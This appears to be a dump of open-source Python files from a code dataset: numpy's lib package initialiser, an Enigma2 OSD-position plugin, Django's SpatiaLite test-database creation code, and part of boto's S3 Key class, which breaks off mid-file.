from __future__ import division, absolute_import, print_function import math from .info import __doc__ from numpy.version import version as __version__ from .type_check import * from .index_tricks import * from .function_base import * from .nanfunctions import * from .shape_base import * from .stride_tricks import * from .twodim_base import * from .ufunclike import * from . import scimath as emath from .polynomial import * #import convertcode from .utils import * from .arraysetops import * from .npyio import * from .financial import * from .arrayterator import * from .arraypad import * __all__ = ['emath', 'math'] __all__ += type_check.__all__ __all__ += index_tricks.__all__ __all__ += function_base.__all__ __all__ += shape_base.__all__ __all__ += stride_tricks.__all__ __all__ += twodim_base.__all__ __all__ += ufunclike.__all__ __all__ += arraypad.__all__ __all__ += polynomial.__all__ __all__ += utils.__all__ __all__ += arraysetops.__all__ __all__ += npyio.__all__ __all__ += financial.__all__ __all__ += nanfunctions.__all__ from numpy.testing import Tester test = Tester().test bench = Tester().bench
gpl-3.0
kingvuplus/EGAMI-E
lib/python/Plugins/SystemPlugins/OSDPositionSetup/plugin.py
41
4968
from Screens.Screen import Screen from Components.ConfigList import ConfigListScreen from Components.config import config, ConfigSubsection, ConfigInteger, ConfigSlider, getConfigListEntry config.plugins.OSDPositionSetup = ConfigSubsection() config.plugins.OSDPositionSetup.dst_left = ConfigInteger(default = 0) config.plugins.OSDPositionSetup.dst_width = ConfigInteger(default = 720) config.plugins.OSDPositionSetup.dst_top = ConfigInteger(default = 0) config.plugins.OSDPositionSetup.dst_height = ConfigInteger(default = 576) class OSDScreenPosition(Screen, ConfigListScreen): skin = """ <screen position="0,0" size="e,e" title="OSD position setup" backgroundColor="blue"> <widget name="config" position="c-175,c-75" size="350,150" foregroundColor="black" backgroundColor="blue" /> <ePixmap pixmap="buttons/green.png" position="c-145,e-100" zPosition="0" size="140,40" alphatest="on" /> <ePixmap pixmap="buttons/red.png" position="c+5,e-100" zPosition="0" size="140,40" alphatest="on" /> <widget name="ok" position="c-145,e-100" size="140,40" valign="center" halign="center" zPosition="1" font="Regular;20" transparent="1" backgroundColor="green" /> <widget name="cancel" position="c+5,e-100" size="140,40" valign="center" halign="center" zPosition="1" font="Regular;20" transparent="1" backgroundColor="red" /> </screen>""" def __init__(self, session): self.skin = OSDScreenPosition.skin Screen.__init__(self, session) from Components.ActionMap import ActionMap from Components.Button import Button self["ok"] = Button(_("OK")) self["cancel"] = Button(_("Cancel")) self["actions"] = ActionMap(["SetupActions", "ColorActions", "MenuActions"], { "ok": self.keyGo, "save": self.keyGo, "cancel": self.keyCancel, "green": self.keyGo, "red": self.keyCancel, "menu": self.closeRecursive, }, -2) self.list = [] ConfigListScreen.__init__(self, self.list, session = self.session) left = config.plugins.OSDPositionSetup.dst_left.value width = config.plugins.OSDPositionSetup.dst_width.value top = config.plugins.OSDPositionSetup.dst_top.value height = config.plugins.OSDPositionSetup.dst_height.value self.dst_left = ConfigSlider(default = left, increment = 1, limits = (0, 720)) self.dst_width = ConfigSlider(default = width, increment = 1, limits = (0, 720)) self.dst_top = ConfigSlider(default = top, increment = 1, limits = (0, 576)) self.dst_height = ConfigSlider(default = height, increment = 1, limits = (0, 576)) self.list.append(getConfigListEntry(_("left"), self.dst_left)) self.list.append(getConfigListEntry(_("width"), self.dst_width)) self.list.append(getConfigListEntry(_("top"), self.dst_top)) self.list.append(getConfigListEntry(_("height"), self.dst_height)) self["config"].list = self.list self["config"].l.setList(self.list) def keyLeft(self): ConfigListScreen.keyLeft(self) self.setPreviewPosition() def keyRight(self): ConfigListScreen.keyRight(self) self.setPreviewPosition() def setPreviewPosition(self): setPosition(int(self.dst_left.value), int(self.dst_width.value), int(self.dst_top.value), int(self.dst_height.value)) def keyGo(self): config.plugins.OSDPositionSetup.dst_left.value = self.dst_left.value config.plugins.OSDPositionSetup.dst_width.value = self.dst_width.value config.plugins.OSDPositionSetup.dst_top.value = self.dst_top.value config.plugins.OSDPositionSetup.dst_height.value = self.dst_height.value config.plugins.OSDPositionSetup.save() self.close() def keyCancel(self): setConfiguredPosition() self.close() def setPosition(dst_left, dst_width, dst_top, dst_height): if dst_left + dst_width > 720: dst_width = 720 - dst_left if dst_top + dst_height > 576: dst_height = 576 - dst_top try: file = open("/proc/stb/vmpeg/0/dst_left", "w") file.write('%X' % dst_left) file.close() file = open("/proc/stb/vmpeg/0/dst_width", "w") file.write('%X' % dst_width) file.close() file = open("/proc/stb/vmpeg/0/dst_top", "w") file.write('%X' % dst_top) file.close() file = open("/proc/stb/vmpeg/0/dst_height", "w") file.write('%X' % dst_height) file.close() except: return def setConfiguredPosition(): setPosition(int(config.plugins.OSDPositionSetup.dst_left.value), int(config.plugins.OSDPositionSetup.dst_width.value), int(config.plugins.OSDPositionSetup.dst_top.value), int(config.plugins.OSDPositionSetup.dst_height.value)) def main(session, **kwargs): session.open(OSDScreenPosition) def startup(reason, **kwargs): setConfiguredPosition() def Plugins(**kwargs): from os import path if path.exists("/proc/stb/vmpeg/0/dst_left"): from Plugins.Plugin import PluginDescriptor return [PluginDescriptor(name = "OSD position setup", description = "Compensate for overscan", where = PluginDescriptor.WHERE_PLUGINMENU, fnc = main), PluginDescriptor(name = "OSD position setup", description = "", where = PluginDescriptor.WHERE_SESSIONSTART, fnc = startup)] return []
gpl-2.0
onceuponatimeforever/oh-mainline
vendor/packages/Django/django/contrib/gis/db/backends/spatialite/creation.py
100
5765
import os from django.conf import settings from django.core.cache import get_cache from django.core.cache.backends.db import BaseDatabaseCache from django.core.exceptions import ImproperlyConfigured from django.db.backends.sqlite3.creation import DatabaseCreation class SpatiaLiteCreation(DatabaseCreation): def create_test_db(self, verbosity=1, autoclobber=False): """ Creates a test database, prompting the user for confirmation if the database already exists. Returns the name of the test database created. This method is overloaded to load up the SpatiaLite initialization SQL prior to calling the `syncdb` command. """ # Don't import django.core.management if it isn't needed. from django.core.management import call_command test_database_name = self._get_test_db_name() if verbosity >= 1: test_db_repr = '' if verbosity >= 2: test_db_repr = " ('%s')" % test_database_name print("Creating test database for alias '%s'%s..." % (self.connection.alias, test_db_repr)) self._create_test_db(verbosity, autoclobber) self.connection.close() self.connection.settings_dict["NAME"] = test_database_name self.connection.ops.confirm_spatial_components_versions() # Need to load the SpatiaLite initialization SQL before running `syncdb`. self.load_spatialite_sql() # Report syncdb messages at one level lower than that requested. # This ensures we don't get flooded with messages during testing # (unless you really ask to be flooded) call_command('syncdb', verbosity=max(verbosity - 1, 0), interactive=False, database=self.connection.alias, load_initial_data=False) # We need to then do a flush to ensure that any data installed by # custom SQL has been removed. The only test data should come from # test fixtures, or autogenerated from post_syncdb triggers. # This has the side effect of loading initial data (which was # intentionally skipped in the syncdb). call_command('flush', verbosity=max(verbosity - 1, 0), interactive=False, database=self.connection.alias) from django.core.cache import get_cache from django.core.cache.backends.db import BaseDatabaseCache for cache_alias in settings.CACHES: cache = get_cache(cache_alias) if isinstance(cache, BaseDatabaseCache): call_command('createcachetable', cache._table, database=self.connection.alias) # Get a cursor (even though we don't need one yet). This has # the side effect of initializing the test database. cursor = self.connection.cursor() return test_database_name def sql_indexes_for_field(self, model, f, style): "Return any spatial index creation SQL for the field." from django.contrib.gis.db.models.fields import GeometryField output = super(SpatiaLiteCreation, self).sql_indexes_for_field(model, f, style) if isinstance(f, GeometryField): gqn = self.connection.ops.geo_quote_name qn = self.connection.ops.quote_name db_table = model._meta.db_table output.append(style.SQL_KEYWORD('SELECT ') + style.SQL_TABLE('AddGeometryColumn') + '(' + style.SQL_TABLE(gqn(db_table)) + ', ' + style.SQL_FIELD(gqn(f.column)) + ', ' + style.SQL_FIELD(str(f.srid)) + ', ' + style.SQL_COLTYPE(gqn(f.geom_type)) + ', ' + style.SQL_KEYWORD(str(f.dim)) + ', ' + style.SQL_KEYWORD(str(int(not f.null))) + ');') if f.spatial_index: output.append(style.SQL_KEYWORD('SELECT ') + style.SQL_TABLE('CreateSpatialIndex') + '(' + style.SQL_TABLE(gqn(db_table)) + ', ' + style.SQL_FIELD(gqn(f.column)) + ');') return output def load_spatialite_sql(self): """ This routine loads up the SpatiaLite SQL file. """ if self.connection.ops.spatial_version[:2] >= (2, 4): # Spatialite >= 2.4 -- No need to load any SQL file, calling # InitSpatialMetaData() transparently creates the spatial metadata # tables cur = self.connection._cursor() cur.execute("SELECT InitSpatialMetaData()") else: # Spatialite < 2.4 -- Load the initial SQL # Getting the location of the SpatiaLite SQL file, and confirming # it exists. spatialite_sql = self.spatialite_init_file() if not os.path.isfile(spatialite_sql): raise ImproperlyConfigured('Could not find the required SpatiaLite initialization ' 'SQL file (necessary for testing): %s' % spatialite_sql) # Opening up the SpatiaLite SQL initialization file and executing # as a script. with open(spatialite_sql, 'r') as sql_fh: cur = self.connection._cursor() cur.executescript(sql_fh.read()) def spatialite_init_file(self): # SPATIALITE_SQL may be placed in settings to tell GeoDjango # to use a specific path to the SpatiaLite initilization SQL. return getattr(settings, 'SPATIALITE_SQL', 'init_spatialite-%s.%s.sql' % self.connection.ops.spatial_version[:2])
agpl-3.0
bleib1dj/boto
boto/s3/key.py
22
82475
# Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/ # Copyright (c) 2011, Nexenta Systems Inc. # Copyright (c) 2012 Amazon.com, Inc. or its affiliates. All Rights Reserved # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. import email.utils import errno import hashlib import mimetypes import os import re import base64 import binascii import math from hashlib import md5 import boto.utils from boto.compat import BytesIO, six, urllib, encodebytes from boto.exception import BotoClientError from boto.exception import StorageDataError from boto.exception import PleaseRetryException from boto.provider import Provider from boto.s3.keyfile import KeyFile from boto.s3.user import User from boto import UserAgent from boto.utils import compute_md5, compute_hash from boto.utils import find_matching_headers from boto.utils import merge_headers_by_name class Key(object): """ Represents a key (object) in an S3 bucket. :ivar bucket: The parent :class:`boto.s3.bucket.Bucket`. :ivar name: The name of this Key object. :ivar metadata: A dictionary containing user metadata that you wish to store with the object or that has been retrieved from an existing object. :ivar cache_control: The value of the `Cache-Control` HTTP header. :ivar content_type: The value of the `Content-Type` HTTP header. :ivar content_encoding: The value of the `Content-Encoding` HTTP header. :ivar content_disposition: The value of the `Content-Disposition` HTTP header. :ivar content_language: The value of the `Content-Language` HTTP header. :ivar etag: The `etag` associated with this object. :ivar last_modified: The string timestamp representing the last time this object was modified in S3. :ivar owner: The ID of the owner of this object. :ivar storage_class: The storage class of the object. Currently, one of: STANDARD | REDUCED_REDUNDANCY | GLACIER :ivar md5: The MD5 hash of the contents of the object. :ivar size: The size, in bytes, of the object. :ivar version_id: The version ID of this object, if it is a versioned object. :ivar encrypted: Whether the object is encrypted while at rest on the server. """ DefaultContentType = 'application/octet-stream' RestoreBody = """<?xml version="1.0" encoding="UTF-8"?> <RestoreRequest xmlns="http://s3.amazonaws.com/doc/2006-03-01"> <Days>%s</Days> </RestoreRequest>""" BufferSize = boto.config.getint('Boto', 'key_buffer_size', 8192) # The object metadata fields a user can set, other than custom metadata # fields (i.e., those beginning with a provider-specific prefix like # x-amz-meta). base_user_settable_fields = set(["cache-control", "content-disposition", "content-encoding", "content-language", "content-md5", "content-type", "x-robots-tag", "expires"]) _underscore_base_user_settable_fields = set() for f in base_user_settable_fields: _underscore_base_user_settable_fields.add(f.replace('-', '_')) # Metadata fields, whether user-settable or not, other than custom # metadata fields (i.e., those beginning with a provider specific prefix # like x-amz-meta). base_fields = (base_user_settable_fields | set(["last-modified", "content-length", "date", "etag"])) def __init__(self, bucket=None, name=None): self.bucket = bucket self.name = name self.metadata = {} self.cache_control = None self.content_type = self.DefaultContentType self.content_encoding = None self.content_disposition = None self.content_language = None self.filename = None self.etag = None self.is_latest = False self.last_modified = None self.owner = None self._storage_class = None self.path = None self.resp = None self.mode = None self.size = None self.version_id = None self.source_version_id = None self.delete_marker = False self.encrypted = None # If the object is being restored, this attribute will be set to True. # If the object is restored, it will be set to False. Otherwise this # value will be None. If the restore is completed (ongoing_restore = # False), the expiry_date will be populated with the expiry date of the # restored object. self.ongoing_restore = None self.expiry_date = None self.local_hashes = {} def __repr__(self): if self.bucket: name = u'<Key: %s,%s>' % (self.bucket.name, self.name) else: name = u'<Key: None,%s>' % self.name # Encode to bytes for Python 2 to prevent display decoding issues if not isinstance(name, str): name = name.encode('utf-8') return name def __iter__(self): return self @property def provider(self): provider = None if self.bucket and self.bucket.connection: provider = self.bucket.connection.provider return provider def _get_key(self): return self.name def _set_key(self, value): self.name = value key = property(_get_key, _set_key); def _get_md5(self): if 'md5' in self.local_hashes and self.local_hashes['md5']: return binascii.b2a_hex(self.local_hashes['md5']) def _set_md5(self, value): if value: self.local_hashes['md5'] = binascii.a2b_hex(value) elif 'md5' in self.local_hashes: self.local_hashes.pop('md5', None) md5 = property(_get_md5, _set_md5); def _get_base64md5(self): if 'md5' in self.local_hashes and self.local_hashes['md5']: md5 = self.local_hashes['md5'] if not isinstance(md5, bytes): md5 = md5.encode('utf-8') return binascii.b2a_base64(md5).decode('utf-8').rstrip('\n') def _set_base64md5(self, value): if value: if not isinstance(value, six.string_types): value = value.decode('utf-8') self.local_hashes['md5'] = binascii.a2b_base64(value) elif 'md5' in self.local_hashes: del self.local_hashes['md5'] base64md5 = property(_get_base64md5, _set_base64md5); def _get_storage_class(self): if self._storage_class is None and self.bucket: # Attempt to fetch storage class list_items = list(self.bucket.list(self.name.encode('utf-8'))) if len(list_items) and getattr(list_items[0], '_storage_class', None): self._storage_class = list_items[0]._storage_class else: # Key is not yet saved? Just use default... self._storage_class = 'STANDARD' return self._storage_class def _set_storage_class(self, value): self._storage_class = value storage_class = property(_get_storage_class, _set_storage_class) def get_md5_from_hexdigest(self, md5_hexdigest): """ A utility function to create the 2-tuple (md5hexdigest, base64md5) from just having a precalculated md5_hexdigest. """ digest = binascii.unhexlify(md5_hexdigest) base64md5 = encodebytes(digest) if base64md5[-1] == '\n': base64md5 = base64md5[0:-1] return (md5_hexdigest, base64md5) def handle_encryption_headers(self, resp): provider = self.bucket.connection.provider if provider.server_side_encryption_header: self.encrypted = resp.getheader( provider.server_side_encryption_header, None) else: self.encrypted = None def handle_version_headers(self, resp, force=False): provider = self.bucket.connection.provider # If the Key object already has a version_id attribute value, it # means that it represents an explicit version and the user is # doing a get_contents_*(version_id=<foo>) to retrieve another # version of the Key. In that case, we don't really want to # overwrite the version_id in this Key object. Comprende? if self.version_id is None or force: self.version_id = resp.getheader(provider.version_id, None) self.source_version_id = resp.getheader(provider.copy_source_version_id, None) if resp.getheader(provider.delete_marker, 'false') == 'true': self.delete_marker = True else: self.delete_marker = False def handle_restore_headers(self, response): provider = self.bucket.connection.provider header = response.getheader(provider.restore_header) if header is None: return parts = header.split(',', 1) for part in parts: key, val = [i.strip() for i in part.split('=')] val = val.replace('"', '') if key == 'ongoing-request': self.ongoing_restore = True if val.lower() == 'true' else False elif key == 'expiry-date': self.expiry_date = val def handle_addl_headers(self, headers): """ Used by Key subclasses to do additional, provider-specific processing of response headers. No-op for this base class. """ pass def open_read(self, headers=None, query_args='', override_num_retries=None, response_headers=None): """ Open this key for reading :type headers: dict :param headers: Headers to pass in the web request :type query_args: string :param query_args: Arguments to pass in the query string (ie, 'torrent') :type override_num_retries: int :param override_num_retries: If not None will override configured num_retries parameter for underlying GET. :type response_headers: dict :param response_headers: A dictionary containing HTTP headers/values that will override any headers associated with the stored object in the response. See http://goo.gl/EWOPb for details. """ if self.resp is None: self.mode = 'r' provider = self.bucket.connection.provider self.resp = self.bucket.connection.make_request( 'GET', self.bucket.name, self.name, headers, query_args=query_args, override_num_retries=override_num_retries) if self.resp.status < 199 or self.resp.status > 299: body = self.resp.read() raise provider.storage_response_error(self.resp.status, self.resp.reason, body) response_headers = self.resp.msg self.metadata = boto.utils.get_aws_metadata(response_headers, provider) for name, value in response_headers.items(): # To get correct size for Range GETs, use Content-Range # header if one was returned. If not, use Content-Length # header. if (name.lower() == 'content-length' and 'Content-Range' not in response_headers): self.size = int(value) elif name.lower() == 'content-range': end_range = re.sub('.*/(.*)', '\\1', value) self.size = int(end_range) elif name.lower() in Key.base_fields: self.__dict__[name.lower().replace('-', '_')] = value self.handle_version_headers(self.resp) self.handle_encryption_headers(self.resp) self.handle_restore_headers(self.resp) self.handle_addl_headers(self.resp.getheaders()) def open_write(self, headers=None, override_num_retries=None): """ Open this key for writing. Not yet implemented :type headers: dict :param headers: Headers to pass in the write request :type override_num_retries: int :param override_num_retries: If not None will override configured num_retries parameter for underlying PUT. """ raise BotoClientError('Not Implemented') def open(self, mode='r', headers=None, query_args=None, override_num_retries=None): if mode == 'r': self.mode = 'r' self.open_read(headers=headers, query_args=query_args, override_num_retries=override_num_retries) elif mode == 'w': self.mode = 'w' self.open_write(headers=headers, override_num_retries=override_num_retries) else: raise BotoClientError('Invalid mode: %s' % mode) closed = False def close(self, fast=False): """ Close this key. :type fast: bool :param fast: True if you want the connection to be closed without first reading the content. This should only be used in cases where subsequent calls don't need to return the content from the open HTTP connection. Note: As explained at http://docs.python.org/2/library/httplib.html#httplib.HTTPConnection.getresponse, callers must read the whole response before sending a new request to the server. Calling Key.close(fast=True) and making a subsequent request to the server will work because boto will get an httplib exception and close/reopen the connection. """ if self.resp and not fast: self.resp.read() self.resp = None self.mode = None self.closed = True def next(self): """ By providing a next method, the key object supports use as an iterator. For example, you can now say: for bytes in key: write bytes to a file or whatever All of the HTTP connection stuff is handled for you. """ self.open_read() data = self.resp.read(self.BufferSize) if not data: self.close() raise StopIteration return data # Python 3 iterator support __next__ = next def read(self, size=0): self.open_read() if size == 0: data = self.resp.read() else: data = self.resp.read(size) if not data: self.close() return data def change_storage_class(self, new_storage_class, dst_bucket=None, validate_dst_bucket=True): """ Change the storage class of an existing key. Depending on whether a different destination bucket is supplied or not, this will either move the item within the bucket, preserving all metadata and ACL info bucket changing the storage class or it will copy the item to the provided destination bucket, also preserving metadata and ACL info. :type new_storage_class: string :param new_storage_class: The new storage class for the Key. Possible values are: * STANDARD * REDUCED_REDUNDANCY :type dst_bucket: string :param dst_bucket: The name of a destination bucket. If not provided the current bucket of the key will be used. :type validate_dst_bucket: bool :param validate_dst_bucket: If True, will validate the dst_bucket by using an extra list request. """ bucket_name = dst_bucket or self.bucket.name if new_storage_class == 'STANDARD': return self.copy(bucket_name, self.name, reduced_redundancy=False, preserve_acl=True, validate_dst_bucket=validate_dst_bucket) elif new_storage_class == 'REDUCED_REDUNDANCY': return self.copy(bucket_name, self.name, reduced_redundancy=True, preserve_acl=True, validate_dst_bucket=validate_dst_bucket) else: raise BotoClientError('Invalid storage class: %s' % new_storage_class) def copy(self, dst_bucket, dst_key, metadata=None, reduced_redundancy=False, preserve_acl=False, encrypt_key=False, validate_dst_bucket=True): """ Copy this Key to another bucket. :type dst_bucket: string :param dst_bucket: The name of the destination bucket :type dst_key: string :param dst_key: The name of the destination key :type metadata: dict :param metadata: Metadata to be associated with new key. If metadata is supplied, it will replace the metadata of the source key being copied. If no metadata is supplied, the source key's metadata will be copied to the new key. :type reduced_redundancy: bool :param reduced_redundancy: If True, this will force the storage class of the new Key to be REDUCED_REDUNDANCY regardless of the storage class of the key being copied. The Reduced Redundancy Storage (RRS) feature of S3, provides lower redundancy at lower storage cost. :type preserve_acl: bool :param preserve_acl: If True, the ACL from the source key will be copied to the destination key. If False, the destination key will have the default ACL. Note that preserving the ACL in the new key object will require two additional API calls to S3, one to retrieve the current ACL and one to set that ACL on the new object. If you don't care about the ACL, a value of False will be significantly more efficient. :type encrypt_key: bool :param encrypt_key: If True, the new copy of the object will be encrypted on the server-side by S3 and will be stored in an encrypted form while at rest in S3. :type validate_dst_bucket: bool :param validate_dst_bucket: If True, will validate the dst_bucket by using an extra list request. :rtype: :class:`boto.s3.key.Key` or subclass :returns: An instance of the newly created key object """ dst_bucket = self.bucket.connection.lookup(dst_bucket, validate_dst_bucket) if reduced_redundancy: storage_class = 'REDUCED_REDUNDANCY' else: storage_class = self.storage_class return dst_bucket.copy_key(dst_key, self.bucket.name, self.name, metadata, storage_class=storage_class, preserve_acl=preserve_acl, encrypt_key=encrypt_key, src_version_id=self.version_id) def startElement(self, name, attrs, connection): if name == 'Owner': self.owner = User(self) return self.owner else: return None def endElement(self, name, value, connection): if name == 'Key': self.name = value elif name == 'ETag': self.etag = value elif name == 'IsLatest': if value == 'true': self.is_latest = True else: self.is_latest = False elif name == 'LastModified': self.last_modified = value elif name == 'Size': self.size = int(value) elif name == 'StorageClass': self.storage_class = value elif name == 'Owner': pass elif name == 'VersionId': self.version_id = value else: setattr(self, name, value) def exists(self, headers=None): """ Returns True if the key exists :rtype: bool :return: Whether the key exists on S3 """ return bool(self.bucket.lookup(self.name, headers=headers)) def delete(self, headers=None): """ Delete this key from S3 """ return self.bucket.delete_key(self.name, version_id=self.version_id, headers=headers) def get_metadata(self, name): return self.metadata.get(name) def set_metadata(self, name, value): # Ensure that metadata that is vital to signing is in the correct # case. Applies to ``Content-Type`` & ``Content-MD5``. if name.lower() == 'content-type': self.metadata['Content-Type'] = value elif name.lower() == 'content-md5': self.metadata['Content-MD5'] = value else: self.metadata[name] = value if name.lower() in Key.base_user_settable_fields: self.__dict__[name.lower().replace('-', '_')] = value def update_metadata(self, d): self.metadata.update(d) # convenience methods for setting/getting ACL def set_acl(self, acl_str, headers=None): if self.bucket is not None: self.bucket.set_acl(acl_str, self.name, headers=headers) def get_acl(self, headers=None): if self.bucket is not None: return self.bucket.get_acl(self.name, headers=headers) def get_xml_acl(self, headers=None): if self.bucket is not None: return self.bucket.get_xml_acl(self.name, headers=headers) def set_xml_acl(self, acl_str, headers=None): if self.bucket is not None: return self.bucket.set_xml_acl(acl_str, self.name, headers=headers) def set_canned_acl(self, acl_str, headers=None): return self.bucket.set_canned_acl(acl_str, self.name, headers) def get_redirect(self): """Return the redirect location configured for this key. If no redirect is configured (via set_redirect), then None will be returned. """ response = self.bucket.connection.make_request( 'HEAD', self.bucket.name, self.name) if response.status == 200: return response.getheader('x-amz-website-redirect-location') else: raise self.provider.storage_response_error( response.status, response.reason, response.read()) def set_redirect(self, redirect_location, headers=None): """Configure this key to redirect to another location. When the bucket associated with this key is accessed from the website endpoint, a 301 redirect will be issued to the specified `redirect_location`. :type redirect_location: string :param redirect_location: The location to redirect. """ if headers is None: headers = {} else: headers = headers.copy() headers['x-amz-website-redirect-location'] = redirect_location response = self.bucket.connection.make_request('PUT', self.bucket.name, self.name, headers) if response.status == 200: return True else: raise self.provider.storage_response_error( response.status, response.reason, response.read()) def make_public(self, headers=None): return self.bucket.set_canned_acl('public-read', self.name, headers) def generate_url(self, expires_in, method='GET', headers=None, query_auth=True, force_http=False, response_headers=None, expires_in_absolute=False, version_id=None, policy=None, reduced_redundancy=False, encrypt_key=False): """ Generate a URL to access this key. :type expires_in: int :param expires_in: How long the url is valid for, in seconds. :type method: string :param method: The method to use for retrieving the file (default is GET). :type headers: dict :param headers: Any headers to pass along in the request. :type query_auth: bool :param query_auth: If True, signs the request in the URL. :type force_http: bool :param force_http: If True, http will be used instead of https. :type response_headers: dict :param response_headers: A dictionary containing HTTP headers/values that will override any headers associated with the stored object in the response. See http://goo.gl/EWOPb for details. :type expires_in_absolute: bool :param expires_in_absolute: :type version_id: string :param version_id: The version_id of the object to GET. If specified this overrides any value in the key. :type policy: :class:`boto.s3.acl.CannedACLStrings` :param policy: A canned ACL policy that will be applied to the new key in S3. :type reduced_redundancy: bool :param reduced_redundancy: If True, this will set the storage class of the new Key to be REDUCED_REDUNDANCY. The Reduced Redundancy Storage (RRS) feature of S3, provides lower redundancy at lower storage cost. :type encrypt_key: bool :param encrypt_key: If True, the new copy of the object will be encrypted on the server-side by S3 and will be stored in an encrypted form while at rest in S3. :rtype: string :return: The URL to access the key """ provider = self.bucket.connection.provider version_id = version_id or self.version_id if headers is None: headers = {} else: headers = headers.copy() # add headers accordingly (usually PUT case) if policy: headers[provider.acl_header] = policy if reduced_redundancy: self.storage_class = 'REDUCED_REDUNDANCY' if provider.storage_class_header: headers[provider.storage_class_header] = self.storage_class if encrypt_key: headers[provider.server_side_encryption_header] = 'AES256' headers = boto.utils.merge_meta(headers, self.metadata, provider) return self.bucket.connection.generate_url(expires_in, method, self.bucket.name, self.name, headers, query_auth, force_http, response_headers, expires_in_absolute, version_id) def send_file(self, fp, headers=None, cb=None, num_cb=10, query_args=None, chunked_transfer=False, size=None): """ Upload a file to a key into a bucket on S3. :type fp: file :param fp: The file pointer to upload. The file pointer must point point at the offset from which you wish to upload. ie. if uploading the full file, it should point at the start of the file. Normally when a file is opened for reading, the fp will point at the first byte. See the bytes parameter below for more info. :type headers: dict :param headers: The headers to pass along with the PUT request :type num_cb: int :param num_cb: (optional) If a callback is specified with the cb parameter this parameter determines the granularity of the callback by defining the maximum number of times the callback will be called during the file transfer. Providing a negative integer will cause your callback to be called with each buffer read. :type query_args: string :param query_args: (optional) Arguments to pass in the query string. :type chunked_transfer: boolean :param chunked_transfer: (optional) If true, we use chunked Transfer-Encoding. :type size: int :param size: (optional) The Maximum number of bytes to read from the file pointer (fp). This is useful when uploading a file in multiple parts where you are splitting the file up into different ranges to be uploaded. If not specified, the default behaviour is to read all bytes from the file pointer. Less bytes may be available. """ self._send_file_internal(fp, headers=headers, cb=cb, num_cb=num_cb, query_args=query_args, chunked_transfer=chunked_transfer, size=size) def _send_file_internal(self, fp, headers=None, cb=None, num_cb=10, query_args=None, chunked_transfer=False, size=None, hash_algs=None): provider = self.bucket.connection.provider try: spos = fp.tell() except IOError: spos = None self.read_from_stream = False # If hash_algs is unset and the MD5 hasn't already been computed, # default to an MD5 hash_alg to hash the data on-the-fly. if hash_algs is None and not self.md5: hash_algs = {'md5': md5} digesters = dict((alg, hash_algs[alg]()) for alg in hash_algs or {}) def sender(http_conn, method, path, data, headers): # This function is called repeatedly for temporary retries # so we must be sure the file pointer is pointing at the # start of the data. if spos is not None and spos != fp.tell(): fp.seek(spos) elif spos is None and self.read_from_stream: # if seek is not supported, and we've read from this # stream already, then we need to abort retries to # avoid setting bad data. raise provider.storage_data_error( 'Cannot retry failed request. fp does not support seeking.') # If the caller explicitly specified host header, tell putrequest # not to add a second host header. Similarly for accept-encoding. skips = {} if boto.utils.find_matching_headers('host', headers): skips['skip_host'] = 1 if boto.utils.find_matching_headers('accept-encoding', headers): skips['skip_accept_encoding'] = 1 http_conn.putrequest(method, path, **skips) for key in headers: http_conn.putheader(key, headers[key]) http_conn.endheaders() save_debug = self.bucket.connection.debug self.bucket.connection.debug = 0 # If the debuglevel < 4 we don't want to show connection # payload, so turn off HTTP connection-level debug output (to # be restored below). # Use the getattr approach to allow this to work in AppEngine. if getattr(http_conn, 'debuglevel', 0) < 4: http_conn.set_debuglevel(0) data_len = 0 if cb: if size: cb_size = size elif self.size: cb_size = self.size else: cb_size = 0 if chunked_transfer and cb_size == 0: # For chunked Transfer, we call the cb for every 1MB # of data transferred, except when we know size. cb_count = (1024 * 1024) / self.BufferSize elif num_cb > 1: cb_count = int( math.ceil(cb_size / self.BufferSize / (num_cb - 1.0))) elif num_cb < 0: cb_count = -1 else: cb_count = 0 i = 0 cb(data_len, cb_size) bytes_togo = size if bytes_togo and bytes_togo < self.BufferSize: chunk = fp.read(bytes_togo) else: chunk = fp.read(self.BufferSize) if not isinstance(chunk, bytes): chunk = chunk.encode('utf-8') if spos is None: # read at least something from a non-seekable fp. self.read_from_stream = True while chunk: chunk_len = len(chunk) data_len += chunk_len if chunked_transfer: http_conn.send('%x;\r\n' % chunk_len) http_conn.send(chunk) http_conn.send('\r\n') else: http_conn.send(chunk) for alg in digesters: digesters[alg].update(chunk) if bytes_togo: bytes_togo -= chunk_len if bytes_togo <= 0: break if cb: i += 1 if i == cb_count or cb_count == -1: cb(data_len, cb_size) i = 0 if bytes_togo and bytes_togo < self.BufferSize: chunk = fp.read(bytes_togo) else: chunk = fp.read(self.BufferSize) if not isinstance(chunk, bytes): chunk = chunk.encode('utf-8') self.size = data_len for alg in digesters: self.local_hashes[alg] = digesters[alg].digest() if chunked_transfer: http_conn.send('0\r\n') # http_conn.send("Content-MD5: %s\r\n" % self.base64md5) http_conn.send('\r\n') if cb and (cb_count <= 1 or i > 0) and data_len > 0: cb(data_len, cb_size) http_conn.set_debuglevel(save_debug) self.bucket.connection.debug = save_debug response = http_conn.getresponse() body = response.read() if not self.should_retry(response, chunked_transfer): raise provider.storage_response_error( response.status, response.reason, body) return response if not headers: headers = {} else: headers = headers.copy() # Overwrite user-supplied user-agent. for header in find_matching_headers('User-Agent', headers): del headers[header] headers['User-Agent'] = UserAgent # If storage_class is None, then a user has not explicitly requested # a storage class, so we can assume STANDARD here if self._storage_class not in [None, 'STANDARD']: headers[provider.storage_class_header] = self.storage_class if find_matching_headers('Content-Encoding', headers): self.content_encoding = merge_headers_by_name( 'Content-Encoding', headers) if find_matching_headers('Content-Language', headers): self.content_language = merge_headers_by_name( 'Content-Language', headers) content_type_headers = find_matching_headers('Content-Type', headers) if content_type_headers: # Some use cases need to suppress sending of the 